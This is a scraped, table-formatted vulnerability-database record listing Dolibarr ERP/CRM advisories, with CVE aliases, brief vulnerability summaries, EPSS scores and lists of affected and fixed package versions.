https://api.first.org/data/v1/epss?cve=CVE-2017-9840 |
|
| 1 |
|
| 2 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9840, GHSA-cwgm-qw8v-hrrg
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3dpn-ry9j-rff6 |
|
| 7 |
| url |
VCID-3ewz-9zgb-efa7 |
| vulnerability_id |
VCID-3ewz-9zgb-efa7 |
| summary |
Dolibarr ERP and CRM Code Injection
Dolibarr ERP/CRM 9.0.1 provides a module named website that provides for creation of public websites with a WYSIWYG editor. It was identified that the editor also allowed inclusion of dynamic code, which can lead to code execution on the host machine. An attacker has to check a setting on the same page, which specifies the inclusion of dynamic content. Thus, a lower privileged user of the application can execute code under the context and permissions of the underlying web server. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3 |
|
|
| aliases |
CVE-2019-11201, GHSA-jwg3-v9xm-v6q9
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3ewz-9zgb-efa7 |
|
| 8 |
| url |
VCID-3xdg-az5a-dyft |
| vulnerability_id |
VCID-3xdg-az5a-dyft |
| summary |
Reflected Cross-Site Scripting (XSS) in Dolibarr
A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2024-34051, GHSA-hv2j-6654-x74q
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3xdg-az5a-dyft |
|
| 9 |
| url |
VCID-4c2v-phxx-y3h8 |
| vulnerability_id |
VCID-4c2v-phxx-y3h8 |
| summary |
Dolibarr vulnerable to Cross-Site Request Forgery
Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2024-31503, GHSA-6ppg-rgrg-f573
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4c2v-phxx-y3h8 |
|
| 10 |
| url |
VCID-4j1s-mnar-1bef |
| vulnerability_id |
VCID-4j1s-mnar-1bef |
| summary |
Dolibarr vulnerable to privilege escalation
Dolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-43138 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.5678 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56826 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56838 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00337 |
| scoring_system |
epss |
| scoring_elements |
0.56831 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-43138 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 15 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 16 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 17 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 18 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 19 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 20 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 21 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 22 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 23 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 24 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 25 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 26 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 27 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 28 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 29 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 30 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1 |
|
|
| aliases |
CVE-2022-43138, GHSA-gh7m-j673-wm97
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4j1s-mnar-1bef |
|
| 11 |
| url |
VCID-62rq-q7na-9kgj |
| vulnerability_id |
VCID-62rq-q7na-9kgj |
| summary |
SQL Injection
An SQL injection vulnerability in `accountancy/customer/card.php` in Dolibarr allows remote authenticated users to execute arbitrary SQL commands via the `id` parameter. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14443 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53094 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53144 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53163 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00295 |
| scoring_system |
epss |
| scoring_elements |
0.53155 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14443 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14443, GHSA-8v7v-6mmm-xjxm
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-62rq-q7na-9kgj |
|
| 12 |
| url |
VCID-651j-rw3n-kkgu |
| vulnerability_id |
VCID-651j-rw3n-kkgu |
| summary |
Incorrect Authorization
Dolibarr does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. A low-privileged attacker can modify the `Private Note`, which only an administrator should have rights to do; the affected field is in the `/adherents/note.php?id=1` endpoint. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25954 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38114 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38179 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38207 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00171 |
| scoring_system |
epss |
| scoring_elements |
0.38204 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25954 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.5 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
